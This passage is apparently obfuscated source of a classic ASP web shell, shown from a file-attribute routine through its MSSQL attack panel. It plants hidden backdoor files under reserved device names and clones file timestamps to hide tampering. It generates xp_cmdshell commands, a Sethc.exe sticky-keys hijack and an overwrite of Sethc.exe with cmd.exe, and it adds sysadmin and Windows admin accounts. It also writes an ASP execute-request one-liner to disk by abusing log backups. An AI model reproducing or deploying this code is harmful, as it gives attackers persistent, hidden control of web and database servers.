  838. doTd"<a href='"&Replace(slvd,"%5C","/")&"' target=_blank>"& zsz(objX.Path,"\")&"</a>",""
  839. End If
  840. doTd nfplv,""
  841. doTd acio,""
  842. echo"<td>"
  843. injj goaction,"unu",sxip,"Edit"," -"
  844. injj goaction,"strwh",sxip,"Rename"," -"
  845. injj goaction,"down",sxip,"Down"," -"
  846. injj goaction,"rvvj",sxip,"Attribute"," -"
  847. ozs "zwg",sxip,"","","","Database",""
  848. mwt"</td>"
  849. uemp
  850. nrf
  851. i=i+1
  852. If i>=20 Then
  853. i=0
  854. Response.Flush()
  855. End If
  856. End If
  857. Next
  858. End If
  859. guenn
  860. echo"</span>"
  861. tvnm(Err)
  862. End Sub
  863. Function whc(vhv)
  864. Dim abaqg
  865. abaqg=""
  866. If vhv>=32 Then
  867. vhv=vhv-32
  868. abaqg=abaqg&"archive|"
  869. End If
  870. If vhv>=16 Then vhv=vhv-16
  871. If vhv>=8 Then vhv=vhv-8
  872. If vhv>=4 Then
  873. vhv=vhv-4
  874. abaqg=abaqg&"system|"
  875. End If
  876. If vhv>=2 Then
  877. vhv=vhv-2
  878. abaqg=abaqg&"hidden|"
  879. End If
  880. If vhv>=1 Then
  881. abaqg=abaqg&"readonly|"
  882. End If
  883. If abaqg=""Then
  884. whc=Array(Null)
  885. Else
  886. whc=Split(Left(abaqg,Len(abaqg)-1),"|")
  887. End If
  888. End Function
  889. Sub qcda()
  890. Dim azchf,avl,gaf,strAtt,vhv,phebk,bxja,gir,ybrxe,fuav
  891. If Not ydnj Then On Error Resume Next
  892. If IsObject(xjab)Then
  893. Set azchf=xjab.GetFile(lqbip)
  894. End If
  895. If IsObject(zjhor)Then
  896. bxja=dzzx(lqbip,"\",False)
  897. gaf=zsz(lqbip,"\")
  898. execute "Set phebk=zjhor.Name"&qrno&"Space(bxja)"
  899. Set avl=phebk.ParseName(gaf)
  900. End If
  901. echo"<center>"
  902. sodx"60%"
  903. cxaqj True
  904. rtas"qtylw","lhirb"
  905. rtas"lqbip",lqbip
  906. abxky 1
  907. fkv"Set / Clone",""
  908. doTd lqbip,""
  909. uemp
  910. abxky 0
  911. doTd"Attributes",""
  912. If IsObject(xjab)Then
  913. vhv=azchf.Attributes
  914. strAtt="<input type=checkbox name=kylxz value=4 class='input' {$system}/>system "
  915. strAtt=strAtt&"<input type=checkbox name=kylxz value=2 {$hidden}/>hide "
  916. strAtt=strAtt&"<input type=checkbox name=kylxz value=1 {$readonly}/>readonly "
  917. strAtt=strAtt&"<input type=checkbox name=kylxz value=32 {$archive}/>save "
  918. fuav=whc(vhv)
  919. For Each ybrxe in fuav
  920. strAtt=Replace(strAtt,"{$"&ybrxe&"}","checked")
  921. Next
  922. doTd strAtt,""
  923. Else
  924. doTd"FSO object disabled,can't get/set attributes -_-~!",""
  925. End If
  926. uemp
  927. If IsObject(zjhor)Then
  928. abxky 1
  929. doTd"Date created",""
  930. doTd phebk.GetDetailsOf(avl,4),""
  931. uemp
  932. abxky 0
  933. doTd"Date last modIfied",""
  934. iiit"text","tbe",phebk.GetDetailsOf(avl,3),"","",""
  935. uemp
  936. abxky 1
  937. doTd"Date last accessed",""
  938. doTd phebk.GetDetailsOf(avl,5),""
  939. uemp
  940. Else
  941. abxky 1
  942. doTd"Date created",""
  943. execute "doTd azchf.DateCr"&ack&"eated,"""""
  944. uemp
  945. abxky 0
  946. doTd"Date last modIfied",""
  947. doTd azchf.DateLastModIfied,""
  948. uemp
  949. abxky 1
  950. doTd"Date last accessed",""
  951. doTd azchf.DateLastAccessed,""
  952. uemp
  953. End If
  954. abxky 0
  955. If IsObject(zjhor)Then
  956. doTd"Clone time ",""
  957. echo"<td>"
  958. rycpp"oth","100%",""
  959. exhpr "","Do not clone"
  960. For Each objX in phebk.Items
  961. If Not objX.IsFolder Then
  962. gir=zsz(objX.Path,"\")
  963. exhpr gir,phebk.GetDetailsOf(phebk.ParseName(gir),3)&" --- "&gir
  964. End If
  965. Next
  966. Else
  967. echo"<td colspan=2>App object disabled,can't modIfy time -_-~!</td>"
  968. End If
  969. guenn
  970. gbqwf
  971. viwe()
  972. End Sub
  973. Sub bizlp()
  974. If Not ydnj Then On Error Resume Next
  975. Dim wabmc,azchf,bxja,gaf,phebk,avl
  976. If IsObject(xjab)Then
  977. Set azchf=xjab.GetFile(lqbip)
  978. End If
  979. If IsObject(zjhor)Then
  980. bxja=dzzx(lqbip,"\",False)
  981. gaf=zsz(lqbip,"\")
  982. execute "Set phebk=zjhor.Name"&qrno&"Space(bxja)"
  983. Set avl=phebk.ParseName(gaf)
  984. End If
  985. If kylxz<>""Then
  986. kylxz=Split(Replace(kylxz," ",""),",")
  987. For i=0 To UBound(kylxz)
  988. wabmc=wabmc+CLng(kylxz(i))
  989. Next
  990. azchf.Attributes=wabmc
  991. If Err Then
  992. tvnm(Err)
  993. Else
  994. yln"Attributes modIfied"
  995. End If
  996. End If
  997. If oth=""Then
  998. If tbe<>"" And IsDate(tbe)Then
  999. avl.ModIfyDate=tbe
  1000. If Err Then
  1001. tvnm(Err)
  1002. Else
  1003. yln"Time modIfied"
  1004. End If
  1005. End If
  1006. Else
  1007. avl.ModIfyDate=phebk.GetDetailsOf(phebk.ParseName(oth),3)
  1008. If Err Then
  1009. tvnm(Err)
  1010. Else
  1011. yln"Time modIfied"
  1012. End If
  1013. End If
  1014. End Sub
  1015. Sub ozt()
  1016. If Not ydnj Then On Error Resume Next
  1017. If fileName<>""Then
  1018. Dim lcbe,tpd,csg
  1019. lcbe="\\.\"&lqbip&"\"&fileName
  1020. If vujc=1 Then
  1021. execute "Call xjab.Mov"&pzih&"eFile(ramoi(""PATH_TRANSLATED""),lcbe)"
  1022. Set tpd=xjab.GetFile(lcbe)
  1023. tpd.Attributes=6
  1024. ome(Err)
  1025. lcbe=Replace(lcbe,"\\.\","")
  1026. csg=Replace(Replace(Replace(nwtcn(Mid(lcbe,Len(zhyko)+1)),"%2E","."),"+","%20"),"%5C","/")
  1027. Response.Redirect(csg)
  1028. Else
  1029. ekg lcbe,ogda
  1030. Set tpd=xjab.GetFile(lcbe)
  1031. tpd.Attributes=6
  1032. End If
  1033. If Err Then
  1034. tvnm(Err)
  1035. Else
  1036. yln"Backdoor established,have fun."
  1037. End If
  1038. Exit Sub
  1039. End If
  1040. cxaqj True
  1041. sodx"100%"
  1042. rtas"qtylw","apicv"
  1043. mwt"<b>Make hidden backdoor</b><br>"
  1044. sodx"100%"
  1045. abxky 1
  1046. doTd"Path","20%"
  1047. iiit"text","lqbip",lqbip,"60%","",""
  1048. fkv"Save","20%"
  1049. uemp
  1050. abxky 0
  1051. doTd"Content",""
  1052. lhue "ogda","",10
  1053. echo"<td>"
  1054. jwik"vujc",1,"Move myself there","onclick='javascript:document.getElementById(""ogda"").disabled=this.checked'"
  1055. echo"</td>"
  1056. uemp
  1057. abxky 1
  1058. echo"<td>"
  1059. rycpp"fileName","100%",""
  1060. exhpr"aux.asp","aux.asp"
  1061. exhpr"con.asp","con.asp"
  1062. exhpr"com1.asp","com1.asp"
  1063. exhpr"com2.asp","com2.asp"
  1064. exhpr"nul.asp","nul.asp"
  1065. exhpr"prn.asp","prn.asp"
  1066. ild
  1067. echo"</td>"
  1068. mwt"<td colspan='2'>Cannot del,cannot open in ordinary way,this will drive the web administrator madness :)</td>"
  1069. uemp
  1070. guenn
  1071. gbqwf
  1072. viwe
  1073. End Sub
  1074. Sub awsr()
  1075. If Not ydnj Then On Error Resume Next
  1076. If lqog="" Or Not IsNumeric(lqog) Then
  1077. lqog=Request.Cookies("lqog")
  1078. Else
  1079. Response.Cookies("lqog")=lqog
  1080. End If
  1081. If lqog="" Or Not IsNumeric(lqog) Then lqog=nhbqw
  1082. If ihk=""Then ihk=Request.Cookies(wseta&"ihk")
  1083. uhrpj()
  1084. If ihk<>""Then
  1085. Select Case qtylw
  1086. Case"wse"
  1087. wse()
  1088. Case"usa"
  1089. usa()
  1090. Case"msbca"
  1091. msbca()
  1092. Case"sls","ttjm"
  1093. fomgk()
  1094. Case Else
  1095. zwg()
  1096. End Select
  1097. End If
  1098. tbr
  1099. viwe
  1100. End Sub
  1101. Sub uhrpj()
  1102. Dim rs,yylxy,kzw,zwtp
  1103. If Not ydnj Then On Error Resume Next
  1104. ajg("Database Operation")
  1105. cxaqj True
  1106. mwt"Connect String : "
  1107. zesc"text","ihk",ihk,160,""
  1108. echo" "
  1109. mwt"page size : "
  1110. zesc"text","lqog",lqog,5,""
  1111. qjr"OK"
  1112. gbqwf
  1113. csyfy"GetConnectString",True
  1114. sodx"80%"
  1115. abxky 1
  1116. doTd"SqlOleDb","10%"
  1117. mwt"<td style=""width:80%"">Server:"
  1118. zesc"text","MsServer","127.0.0.1","15",""
  1119. echo" Username:"
  1120. zesc"text","MsUser","sa","10",""
  1121. echo" Password:"
  1122. zesc"text","MsPass","","10",""
  1123. echo" DataBase:"
  1124. zesc"text","DBPath","","10",""
  1125. jwik "MsSspi","1","Windows Authentication",""
  1126. echo"</td>"
  1127. iiit"button","","Generate","10%","onClick=""javascript:tywoa(MsServer.value,MsUser.value,MsPass.value,DBPath.value,MsSspi.checked)""",""
  1128. uemp
  1129. abxky 0
  1130. doTd"Jet",""
  1131. mwt"<td>DB path:"
  1132. zesc"text","accdbpath",nzax&"\","82",""
  1133. echo"</td>"
  1134. iiit"button","","Generate","10%","onClick=""javascript:kew(accdbpath.value)""",""
  1135. uemp
  1136. guenn
  1137. echo"</span><hr>"
  1138. If Err Then Err.clear
  1139. If ihk<>""Then
  1140. lswls ihk
  1141. suzn wseta&"ihk",ihk
  1142. Set rs=nfffq("Ad"+oge+"odb.R"+zui+"ecordSet")
  1143. rs.Open "select @@version,db_name()",conn,1,1
  1144. If Err Then
  1145. acjdi="access"
  1146. Err.clear
  1147. Set rs=Nothing
  1148. Set rs=nfffq("Ad"+oge+"odb.R"+zui+"ecordSet")
  1149. rs.Open "select cstr('access')",conn,1,1
  1150. If Err Then
  1151. acjdi="others"
  1152. Err.clear
  1153. End If
  1154. rs.Close
  1155. Set rs=Nothing
  1156. Else
  1157. ryfj=rs(0)
  1158. podw=rs(1)
  1159. rs.close
  1160. acjdi="mssql"
  1161. %>
  1162. <script>
  1163. var oonsd='';function zfzf(path){var regRoot=dzzx(path,'\\',true);path=path.substr(regRoot.length+1);var regKey=zsz(path,'\\');var aiw=dzzx(path,'\\',false);return(new Array(regRoot,aiw,regKey));}function ekt(knfe){form2.ybgqm.value="exec mast"+oonsd+"er..xp"+oonsd+"_cmdshell '"+knfe+"'";}function sxubi(aiw){var regarr=zfzf(aiw);form2.ybgqm.value="exec mast"+oonsd+"er..xp_regread '"+regarr[0]+"','"+regarr[1]+"','"+regarr[2]+"'";}function lkae(nxfic){form2.ybgqm.value="exec mast"+oonsd+"er..xp_dirtree '"+nxfic+"',1,1";}function azohr(ths,cpbdz,ltkwa){if(ltkwa==2){form2.ybgqm.value="if object_id('dark_temp')is not null drop table dark_temp;create table dark_temp(aa nvarchar(4000));bulk insert dark_temp from'"+cpbdz+"'";}else{form2.ybgqm.value="declare @a int;exec mast"+oonsd+"er..sp_oacr"+oonsd+"eate'WS"+oonsd+"cript.She"+oonsd+"ll',@a output;exec mast"+oonsd+"er..sp_oameth"+oonsd+"od @a,'run',null,'"+ths+" > "+cpbdz+"',0,'true'";}}function ojlqe(net,cmj,vxeyd,nspwd){switch(nspwd){case '1':form2.ybgqm.value="exec mast"+oonsd+"er..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTW"+oonsd+"ARE\Microsoft\Jet\4.0\En"+oonsd+"gines','SandBo"+oonsd+"xMode','REG_DWORD',0";break;case '2':net=net.replace(/"/g,'""');form2.ybgqm.value="Select * From openro"+oonsd+"wSet('Microsoft.Jet.OLEDB.4.0',';Database="+cmj+"','select shell(\""+net+" > "+vxeyd+"\")')";break;case '3':form2.ybgqm.value="if object_id('dark_temp')is not null drop table dark_temp;create table dark_temp(aa nvarchar(4000));bulk insert dark_temp from'"+vxeyd+"'";break;}}function jxw(ggwz,wvkc){form2.ybgqm.value="declare @a int;exec mast"+oonsd+"er..sp_oacr"+oonsd+"eate'Scriptin"+oonsd+"g.FileSystemObj"+oonsd+"ect',@a output;exec mast"+oonsd+"er..sp_oameth"+oonsd+"od @a,'CopyFile',null,'"+ggwz+"','"+wvkc+"'";}function wfrtn(fhbej,tcppp){form2.ybgqm.value="exec mast"+oonsd+"er..xp_makecab 'C:\\windows\\temp\\~098611.tmp','default',1,'"+fhbej+"';exec mast"+oonsd+"er..xp_unpackcab 'C:\\windows\\temp\\~098611.tmp','"+dzzx(tcppp,"\\",false)+"',1,'"+zsz(tcppp,"\\")+"'";}function cuuu(anpj,xppp){form2.ybgqm.value="use mast"+oonsd+"er;dbcc addextEndedpr"+oonsd+"oc('"+anpj+"','"+xppp+"')";}function bud(wpy){form2.ybgqm.value="use mast"+oonsd+"er;dbcc dropextEndedproc('"+wpy+"')";}function tekgs(epvr){form2.ybgqm.value="exec mast"+oonsd+"er..sp_configure 'show advanced options',1;RECONFIGURE;EXEC mast"+oonsd+"er..sp_configure '"+epvr+"',1;RECONFIGURE";}function zhjsq(zsaq,pqote,qgi){var regarr=zfzf(zsaq);if (pqote=="REG_SZ"){qgi="'"+qgi+"'";}form2.ybgqm.value="exec mast"+oonsd+"er..xp_regwrite '"+regarr[0]+"','"+regarr[1]+"','"+regarr[2]+"','"+pqote+"',"+qgi;}function oqwdw(name,pass){form2.ybgqm.value="exec mast"+oonsd+"er..sp_addlogin '"+name+"','"+pass+"';exec mast"+oonsd+"er..sp_add"+oonsd+"srvrolemember '"+name+"','sysadmin'";}function fkggf(name,pass){form2.ybgqm.value="declare @a int;exec mast"+oonsd+"er..sp_oacr"+oonsd+"eate 'ScriptControl',@a output;exec mast"+oonsd+"er..sp_oasetprop"+oonsd+"erty @a,'language','VBScript';exec mast"+oonsd+"er..sp_oameth"+oonsd+"od @a,'addcode',null,'sub add():Set o=CreateObject(\"She"+oonsd+"ll.Users\"):Set u=o.create(\""+name+"\"):u.Chan"+oonsd+"gePassword \""+pass+"\",\"\":u.setting(\"AccountType\")=3:end sub';exec mast"+oonsd+"er..sp_oameth"+oonsd+"od @a,'run',null,'add'";}function wdkbc(bejh,niypd,podw,wvj){switch(wvj){case '1':form2.ybgqm.value="alter database ["+podw+"] Set recovery full;dump transaction ["+podw+"] with no_log;if object_id('dark_temp')is not null drop table dark_temp;create table dark_temp(aa sql_variant primary key)";break;case '2':form2.ybgqm.value="backup database ["+podw+"] to disk='C:\\windows\\temp\\~098611.tmp' with init";break;case '3':form2.ybgqm.value="insert dark_temp values('"+bejh.replace(/'/g,"''")+"')";break;case '4':form2.ybgqm.value="backup log ["+podw+"] to disk='"+niypd+"';drop table dark_temp";break;}}function euxpo(podw){var re=/(database|initial catalog) *=[^;]+/i;if(sqlForm.ihk.value.match(re)){sqlForm.ihk.value=miig(sqlForm.ihk.value.replace(re,"$1="+podw));sqlForm.qtylw.value="zwg";sqlForm.submit();}else{alert("Can not get database name in connect string!");}}
  1164. </script>
  1165. <%
  1166. End If
  1167. If qtylw="wse"And ybgqm=""Then
  1168. If acjdi="others"Then
  1169. ybgqm="select * from "&rxg
  1170. Else
  1171. ybgqm="select * from ["&rxg&"]"
  1172. End If
  1173. End If
  1174. ozs "zwg","","","","","Show Tables",""
  1175. echo"<br>"
  1176. cxaqj True
  1177. rtas"qtylw","wse"
  1178. rtas"ihk",ihk
  1179. sodx"100%"
  1180. If acjdi="mssql"Then
  1181. abxky 1
  1182. mwt"<td colspan=4>Version : "&mszsa(ryfj)&"</td>"
  1183. uemp
  1184. yylxy="sysadmin|db_owner|public"
  1185. abxky 0
  1186. echo"<td colspan=4>"
  1187. For Each strrole in Split(yylxy,"|")
  1188. If strrole="sysadmin"Then
  1189. rs.Open "select IS_SRVROLEMEMBER('"&strrole&"')",conn,1,1
  1190. Else
  1191. rs.Open "select IS_MEMBER('"&strrole&"')",conn,1,1
  1192. End If
  1193. If rs(0)=1 Then
  1194. echo "Current Privilege : <font color='red'>"&strrole&"</font> "
  1195. rs.close
  1196. Exit For
  1197. End If
  1198. rs.close
  1199. Next
  1200. echo "| Switch Database : "
  1201. rs.Open "select name from mast"+mqe+"er..sysdatabases",conn,1,1
  1202. rs.movefirst
  1203. Do While Not rs.eof
  1204. echo "<a href=javascript:euxpo('"&rs("name")&"')>"&rs("name")&"</a> | "
  1205. rs.movenext
  1206. Loop
  1207. echo"</td></tr>"
  1208. nrf
  1209. rs.close
  1210. Set rs=Nothing
  1211. End If
  1212. abxky 1
  1213. doTd"Execute Sql","10%"
  1214. lhue"ybgqm",ybgqm,5
  1215. fkv"Submit","5%"
  1216. iiit"button","","Export","5%","onClick='tort();'",""
  1217. uemp
  1218. guenn
  1219. gbqwf
  1220. If acjdi="mssql"Then
  1221. echo"Functions : "
  1222. kzw=Split("xp_cmd|xp_dir|xp_reg|xp_regw|wsexec|sbexec|fsocopy|makecab|addproc|delproc|enfunc|addlogin|addsys|logback|sls|ttjm","|")
  1223. zwtp=Split("xp"+cla+"_cmdshell|xp_dirtree|xp_regread|xp_regwrite|ws exec|sandbox exec|FSO copy|Cab copy|add procedure|del procedure|enable function|add sql user|add sys user|logbackup|saupfile|sadownfile","|")
  1224. For i=0 To UBound(kzw)
  1225. echo"<a href='#' onClick=""javascript:bik("&kzw(i)&")"" class='hidehref'>"&zwtp(i)&"</a> | "
  1226. Next
  1227. echo"<br><br>"
  1228. uxmhj"xp_cmd",True
  1229. sodx"100%"
  1230. abxky 1
  1231. doTd"com"+nhmkc+"mand","10%"
  1232. iiit"text","knfe","net u"+rmct+"ser","80%","",""
  1233. iiit"button","","Generate","10%","onClick=""javascript:ekt(knfe.value)""",""
  1234. uemp
  1235. guenn
  1236. echo"</span>"
  1237. uxmhj"xp_dir",True
  1238. sodx"100%"
  1239. abxky 1
  1240. doTd"Path","10%"
  1241. iiit"text","nxfic",nzax,"80%","",""
  1242. iiit"button","","Generate","10%","onClick=""javascript:lkae(nxfic.value)""",""
  1243. uemp
  1244. guenn
  1245. echo"</span>"
  1246. uxmhj"xp_reg",True
  1247. sodx"100%"
  1248. abxky 1
  1249. doTd"Path","10%"
  1250. iiit"text","xpregpath","HKEY_LOCAL_MACHINE\SYSTEM\Curre"+fewse+"ntControlSet\Control\ComputerNa"+wwva+"me\ComputerNa"+wwva+"me\ComputerNa"+wwva+"me","80%","",""
  1251. iiit"button","","Generate","10%","onClick=""javascript:sxubi(xpregpath.value)""",""
  1252. uemp
  1253. guenn
  1254. echo"</span>"
  1255. uxmhj"xp_regw",True
  1256. sodx"100%"
  1257. abxky 1
  1258. doTd"Path","10%"
  1259. iiit"text","zsaq","HKEY_LOCAL_MACHINE\SOFTW"+wjw+"ARE\Microsoft\Window"+zfd+"s NT\Curren"+suctf+"tVersion\Image File Execution Options\Sethc.exe\debugger","80%","","4"
  1260. uemp
  1261. abxky 0
  1262. doTd"Type",""
  1263. echo"<td width='30%'>"
  1264. rycpp"pqote","100%",""
  1265. exhpr "REG_SZ","REG_SZ"
  1266. exhpr "REG_DWORD","REG_DWORD"
  1267. exhpr "REG_BINARY","REG_BINARY"
  1268. ild
  1269. echo"</td>"
  1270. doTd"Value",""
  1271. iiit"text","qgi","cmd.exe","40%","",""
  1272. iiit"button","","Generate","10%","onClick=""javascript:zhjsq(zsaq.value,document.all.pqote.value,qgi.value)""",""
  1273. uemp
  1274. guenn
  1275. echo"</span>"
  1276. uxmhj"wsexec",True
  1277. sodx"100%"
  1278. abxky 1
  1279. doTd"com"+nhmkc+"mand","10%"
  1280. iiit"text","ths","cmd /c net u"+rmct+"ser","","","4"
  1281. uemp
  1282. abxky 0
  1283. doTd"Temp File",""
  1284. iiit"text","cpbdz","C:\WINDOWS\Temp\~098611.tmp","50%","",""
  1285. doTd"Step","20%"
  1286. echo"<td width='10%'>"
  1287. rycpp"ltkwa","100%",""
  1288. exhpr 1,1
  1289. exhpr 2,2
  1290. ild
  1291. echo"</td>"
  1292. iiit"button","","Generate","10%","onClick=""javascript:azohr(ths.value,cpbdz.value,document.all.ltkwa.value)""",""
  1293. uemp
  1294. guenn
  1295. echo"</span>"
  1296. uxmhj"sbexec",True
  1297. sodx"100%"
  1298. abxky 1
  1299. doTd"com"+nhmkc+"mand","10%"
  1300. iiit"text","net","cmd /c net u"+rmct+"ser","","","5"
  1301. uemp
  1302. abxky 0
  1303. doTd"Mdb Path",""
  1304. iiit"text","cmj","C:\windows\syste"+xyjdv+"m32\ias\ias.mdb","30%","",""
  1305. doTd"Temp File","10%"
  1306. iiit"text","vxeyd","C:\WINDOWS\Temp\~098611.tmp","30%","",""
  1307. echo"<td width='10%'>Step "
  1308. rycpp"nspwd","40px",""
  1309. exhpr 1,1
  1310. exhpr 2,2
  1311. exhpr 3,3
  1312. ild
  1313. echo"</td>"
  1314. iiit"button","","Generate","10%","onClick=""javascript:ojlqe(net.value,cmj.value,vxeyd.value,document.all.nspwd.value)""",""
  1315. uemp
  1316. guenn
  1317. echo"</span>"
  1318. uxmhj"fsocopy",True
  1319. sodx"100%"
  1320. abxky 1
  1321. doTd"Source","10%"
  1322. iiit"text","ggwz","C:\WINDOWS\syste"+xyjdv+"m32\cmd.exe","35%","",""
  1323. doTd"Target","10%"
  1324. iiit"text","wvkc","C:\WINDOWS\syste"+xyjdv+"m32\Sethc.exe","35%","",""
  1325. iiit"button","","Generate","10%","onClick=""javascript:jxw(ggwz.value,wvkc.value)""",""
  1326. uemp
  1327. guenn
  1328. echo"</span>"
  1329. uxmhj"makecab",True
  1330. sodx"100%"
  1331. abxky 1
  1332. doTd"Source","10%"
  1333. iiit"text","fhbej","C:\WINDOWS\syste"+xyjdv+"m32\cmd.exe","35%","",""
  1334. doTd"Target","10%"
  1335. iiit"text","tcppp","C:\WINDOWS\syste"+xyjdv+"m32\Sethc.exe","35%","",""
  1336. iiit"button","","Generate","10%","onClick=""javascript:wfrtn(fhbej.value,tcppp.value)""",""
  1337. uemp
  1338. guenn
  1339. echo"</span>"
  1340. uxmhj"addproc",True
  1341. sodx"80%%"
  1342. abxky 1
  1343. doTd"Procedure","20%"
  1344. echo"<td width='20%'>"
  1345. rycpp"anpj","100%",""
  1346. exhpr "xp"+cla+"_cmdshell","xp"+cla+"_cmdshell"
  1347. exhpr "xp_dirtree","xp_dirtree"
  1348. exhpr "xp_regread","xp_regread"
  1349. exhpr "xp_regwrite","xp_regwrite"
  1350. exhpr "sp_oacr"+mml+"eate","sp_oacr"+mml+"eate"
  1351. ild
  1352. doTd"DLL","20%"
  1353. echo"<td width='20%'>"
  1354. rycpp"xppp","100%",""
  1355. exhpr "xplog"+nmdg+"70.dll","xplog"+nmdg+"70.dll"
  1356. exhpr "xpstar.dll","xpstar.dll"
  1357. exhpr "odsole70.dll","odsole70.dll"
  1358. ild
  1359. iiit"button","","Generate","20%","onClick=""javascript:cuuu(document.all.anpj.value,document.all.xppp.value)""",""
  1360. uemp
  1361. guenn
  1362. echo"</span>"
  1363. uxmhj"delproc",True
  1364. sodx"40%"
  1365. abxky 1
  1366. doTd"Procedure","30%"
  1367. echo"<td width='40%'>"
  1368. rycpp"wpy","100%",""
  1369. exhpr "xp"+cla+"_cmdshell","xp"+cla+"_cmdshell"
  1370. exhpr "xp_dirtree","xp_dirtree"
  1371. exhpr "xp_regread","xp_regread"
  1372. exhpr "xp_regwrite","xp_regwrite"
  1373. exhpr "sp_oacr"+mml+"eate","sp_oacr"+mml+"eate"
  1374. ild
  1375. echo"</td>"
  1376. iiit"button","","Generate","30%","onClick=""javascript:bud(document.all.wpy.value)""",""
  1377. uemp
  1378. guenn
  1379. echo"</span>"
  1380. uxmhj"enfunc",True
  1381. sodx"40%"
  1382. abxky 1
  1383. doTd"Function","30%"
  1384. echo"<td width='40%'>"
  1385. rycpp"epvr","100%",""
  1386. exhpr "xp"+cla+"_cmdshell","xp"+cla+"_cmdshell"
  1387. exhpr "Ole Automation Procedures","sp_oacr"+mml+"eate"
  1388. exhpr "Ad Hoc Distributed Queries","openro"+unw+"wSet"
  1389. ild
  1390. echo"</td>"
  1391. iiit"button","","Generate","30%","onClick=""javascript:tekgs(document.all.epvr.value)""",""
  1392. uemp
  1393. guenn
  1394. echo"</span>"
  1395. uxmhj"addlogin",True
  1396. sodx"80%"
  1397. abxky 1
  1398. doTd"Username","10%"
  1399. iiit"text","addusername","admin$","30%","",""
  1400. doTd"Password","10%"
  1401. iiit"text","adduserpass","fuckyou","30%","",""
  1402. iiit"button","","Generate","20%","onClick=""javascript:oqwdw(addusername.value,adduserpass.value)""",""
  1403. uemp
  1404. guenn
  1405. echo"</span>"
  1406. uxmhj"addsys",True
  1407. sodx"80%"
  1408. abxky 1
  1409. doTd"Username","10%"
  1410. iiit"text","sysname","admin$","30%","",""
  1411. doTd"Password","10%"
  1412. iiit"text","syspass","fuckyou","30%","",""
  1413. iiit"button","","Generate","20%","onClick=""javascript:fkggf(sysname.value,syspass.value)""",""
  1414. uemp
  1415. guenn
  1416. echo"</span>"
  1417. uxmhj"logback",True
  1418. sodx"100%"
  1419. abxky 1
  1420. doTd"Content","10%"
  1421. echo"<td colspan='4'>"
  1422. eks"bejh","<%response.clear:execute request(""value""):response.End%"&">","100%",5,""
  1423. echo"</td>"
  1424. iiit"button","","Generate","10%","onClick=""javascript:wdkbc(bejh.value,niypd.value,logdb.value,document.all.logstep.value)""",""
  1425. uemp
  1426. abxky 0
  1427. doTd"Path","10%"
  1428. iiit"text","niypd",wxw(".")&"\system.asp","40%","",""
  1429. doTd"Database","10%"
  1430. iiit"text","logdb",podw,"20%","",""
  1431. doTd"Step","10%"
  1432. echo"<td width='10%'>"
  1433. rycpp"logstep","100%",""
  1434. exhpr 1,1
  1435. exhpr 2,2
  1436. exhpr 3,3
  1437. exhpr 4,4
  1438. ild
  1439. echo"</td>"
  1440. uemp
  1441. guenn
  1442. echo"</span>"
  1443. uxmhj"sls",True
  1444. mwt"<form method=""post"" id=""saform""action="""&cngn&"""enctype=""multipart/form-data"">"
  1445. rtas"goaction",goaction
  1446. rtas"qtylw","sls"
  1447. rtas"ihk",ihk
  1448. sodx"100%"
  1449. abxky 1
  1450. iiit"file","fomgk","","30%","",""
  1451. mwt"<td align='right'>Save as(full path):</td>"
  1452. iiit"text","lqbip","","40%","",""
  1453. iiit"button","","Upload","10%","onClick=""javascript:qjr('"&goaction&"','fomgk','')""",""
  1454. uemp
  1455. guenn
  1456. gbqwf
  1457. echo"</span>"
  1458. uxmhj"ttjm",True
  1459. cxaqj True
  1460. rtas"qtylw","ttjm"
  1461. rtas"ihk",ihk
  1462. sodx"100%"
  1463. abxky 1
  1464. doTd"Remoto file(full path)",""
  1465. iiit"text","wckz","","30%","",""
  1466. doTd"Save as",""
  1467. iiit"text","lqbip",nzax,"30%","",""
  1468. fkv"Download","10%"
  1469. uemp
  1470. guenn
  1471. gbqwf
  1472. echo"</span>"
  1473. End If
  1474. echo"<hr>"
  1475. End If
  1476. End Sub
  1477. Sub usa()
  1478. If Not ydnj Then On Error Resume Next
  1479. If acjdi<>"others" Then rxg="["&rxg&"]"
  1480. conn.Execute"drop table "&rxg,-1,&H0001
  1481. If Err Then
  1482. tvnm(Err)
  1483. Else
  1484. yln("Table deleted.")
  1485. End If
  1486. zwg()
  1487. End Sub
  1488. Sub msbca()
  1489. Dim rs,i,sxip
  1490. If Not ydnj Then On Error Resume Next
  1491. If ybgqm="" Then
  1492. sxip=rxg
  1493. If acjdi<>"others" Then rxg="["&rxg&"]"
  1494. ybgqm="select * from "&rxg
  1495. Else
  1496. sxip="export"
  1497. End If
  1498. i=0
  1499. Set rs=conn.Execute(ybgqm,-1,&H0001)
  1500. ome(Err)
  1501. If rs.Fields.Count>0 Then
  1502. Response.Clear
  1503. Session.CodePage=936
  1504. Response.Status="200 OK"
  1505. Response.AddHeader"Content-Disposition","Attachment; Filename="&sxip&".txt"
  1506. Session.CodePage=65001
  1507. Response.AddHeader"Content-Type","text/html"
  1508. For i=0 To rs.Fields.Count-1
  1509. echo CStr(rs.Fields(i).Name)
  1510. If i<rs.Fields.Count-1 Then echo Chr(9)
  1511. Next
  1512. echo vbCrLf
  1513. Do Until rs.EOF
  1514. For i=0 To rs.Fields.Count-1
  1515. echo CStr(rs(i))
  1516. If i<rs.Fields.Count-1 Then echo Chr(9)
  1517. Next
  1518. echo vbCrLf
  1519. rs.MoveNext
  1520. i=i+1
  1521. If i>=20 Then
  1522. i=0
  1523. Response.Flush()
  1524. End If
  1525. Loop
  1526. Else
  1527. yln"It's empty."
  1528. zwg()
  1529. viwe
  1530. End If
  1531. rs.Close
  1532. Set rs=Nothing
  1533. response.End
  1534. End Sub
  1535. Sub fomgk()
  1536. qqp="8.0|1|1       SQLIMAGE      0       {size}       """"                        1     binfile     """"|"
  1537. conn.execute "If object_id('dark_temp')is not null drop table dark_temp"
  1538. If InStr(ryfj,"Microsoft SQL Server 2005")>0 Then
  1539. qqp=Replace(qqp,"8.0","9.0")
  1540. conn.execute("EXEC mast"+mqe+"er..sp_configure 'show advanced options', 1;RECONFIGURE;EXEC mast"+mqe+"er..sp_configure 'xp"+cla+"_cmdshell', 1;RECONFIGURE;")
  1541. End If
  1542. If qtylw="ttjm"Then
  1543. Dim rs,size
  1544. If lqbip=""Or wckz="" Then
  1545. yln"Not enough parameters."
  1546. zwg()
  1547. viwe
  1548. ElseIf InstrRev(wckz,".")<InstrRev(wckz,"\")Then
  1549. yln"You can't download a folder -_-~!"
  1550. zwg()
  1551. viwe
  1552. ElseIf InstrRev(lqbip,".")<InstrRev(lqbip,"\")Then
  1553. lqbip=lqbip&"\"&zsz(wckz,"\")
  1554. End If
